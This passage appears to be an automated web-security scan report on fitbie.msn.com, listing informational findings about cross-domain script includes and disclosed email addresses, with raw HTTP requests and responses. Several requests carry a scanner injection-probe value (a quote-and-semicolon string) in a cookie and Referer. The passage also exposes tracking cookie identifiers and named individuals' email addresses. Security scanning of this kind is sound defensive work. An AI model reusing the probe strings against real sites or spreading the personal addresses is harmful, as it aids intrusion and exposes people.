Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:47 +0000
ETag: "1297607327-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42838
Expires: Mon, 14 Feb 2011 02:29:31 GMT
Date: Sun, 13 Feb 2011 14:35:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 88736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.47. http://fitbie.msn.com/workout/small-changes-big-results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/small-changes-big-results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/small-changes-big-results HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:42 +0000
ETag: "1297607322-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42838
Expires: Mon, 14 Feb 2011 02:29:22 GMT
Date: Sun, 13 Feb 2011 14:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.48. http://fitbie.msn.com/workout/transform-your-body-strength-workout-d

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/transform-your-body-strength-workout-d

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/transform-your-body-strength-workout-d HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:50 +0000
ETag: "1297607330-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42775
Expires: Mon, 14 Feb 2011 02:29:00 GMT
Date: Sun, 13 Feb 2011 14:36:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 84612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.49. http://fitbie.msn.com/workout/transform-your-body-strength-workout-e

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/transform-your-body-strength-workout-e

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/transform-your-body-strength-workout-e HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:49 +0000
ETag: "1297607329-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42741
Expires: Mon, 14 Feb 2011 02:28:02 GMT
Date: Sun, 13 Feb 2011 14:35:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 84812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.50. http://fitbie.msn.com/workout/transform-your-body-strength-workout-f

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/transform-your-body-strength-workout-f

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/transform-your-body-strength-workout-f HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:48 +0000
ETag: "1297607328-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42814
Expires: Mon, 14 Feb 2011 02:29:10 GMT
Date: Sun, 13 Feb 2011 14:35:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.51. http://fitbie.msn.com/workout/your-instant-beach-body

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/your-instant-beach-body

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/your-instant-beach-body HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:39 +0000
ETag: "1297607319-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42788
Expires: Mon, 14 Feb 2011 02:28:30 GMT
Date: Sun, 13 Feb 2011 14:35:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.52. http://fitbie.msn.com/workouts-men/trimming-tools

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workouts-men/trimming-tools

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workouts-men/trimming-tools HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:07 +0000
ETag: "1297607347-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42691
Expires: Mon, 14 Feb 2011 02:28:56 GMT
Date: Sun, 13 Feb 2011 14:37:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 90603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

6. Email addresses disclosed
There are 4 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://fitbie.msn.com/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /contact

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:57 +0000
ETag: "1297607337-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42709
Expires: Mon, 14 Feb 2011 02:28:37 GMT
Date: Sun, 13 Feb 2011 14:36:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="mailto:editors@fitbie.com">editors@fitbie.com</a>
...[SNIP]...
<a href="mailto:editors@fitbie.com">editors@fitbie.com</a>
...[SNIP]...
<a href="mailto:editors@fitbie.com">editors@fitbie.com</a>
...[SNIP]...
<a href="mailto:weightloss@fitbie.com">weightloss@fitbie.com</a>
...[SNIP]...
<a href="mailto:support@fitbie.com">support@fitbie.com</a>
...[SNIP]...
<a href="mailto:Allison.Falkenberry@Rodale.com">Allison.Falkenberry@Rodale.com</a>
...[SNIP]...
<a href="mailto:Karen.Shosfy@Rodale.com">Karen.Shosfy@Rodale.com</a>
...[SNIP]...

6.2. http://fitbie.msn.com/sites/all/modules/quicktabs/js/quicktabs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/quicktabs/js/quicktabs.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/modules/quicktabs/js/quicktabs.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
Last-Modified: Wed, 29 Dec 2010 20:20:18 GMT
ETag: "e810b-1962-498924c348480"
Accept-Ranges: bytes
Content-Length: 6498
Content-Type: application/javascript
Cache-Control: max-age=959941
Expires: Thu, 24 Feb 2011 16:56:46 GMT
Date: Sun, 13 Feb 2011 14:17:45 GMT
Connection: close

// $Id: quicktabs.js,v 1.3.2.18 2009/09/29 03:02:37 pasqualle Exp $

Drupal.settings.views = Drupal.settings.views || {'ajax_path': 'views/ajax'};

Drupal.behaviors.quicktabs = function (context) {

...[SNIP]...
g(el.id.indexOf('-') +1);

$(el).find('ul.quicktabs_tabs li a').each(function(){
this.myTabIndex = i++;
this.qtid = qtid;
// This one line change made for Rodale MSN FitLife #CORE HACK - mgalvin@northps.com
//$(this).bind('click', quicktabsClick);
$(this).bind('mouseover', quicktabsClick);
});

// Search for the active tab.
var $active_tab = $(el).children('.quicktabs_tabs').find('li.active a');

if ($active_tab.hasClass('qt_tab') || $active_tab.hasClass('qt_ajax_tab')) {
// This one line change made for Rodale MSN FitLife #CORE HACK - mgalvin@northps.com
//$active_tab.trigger('click');
$active_tab.trigger('mouseover');
}
else {
// Click on the first tab.
// This one line change made for Rodale MSN FitLife #CORE HACK - mgalvin@northps.com
//$(el).children('.quicktabs_tabs').find('li.first a').trigger('click');
$(el).children('.quicktabs_tabs').find('li.first a').trigger('mouseover');
}
return false;
}

// constructor for an
...[SNIP]...

6.3. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
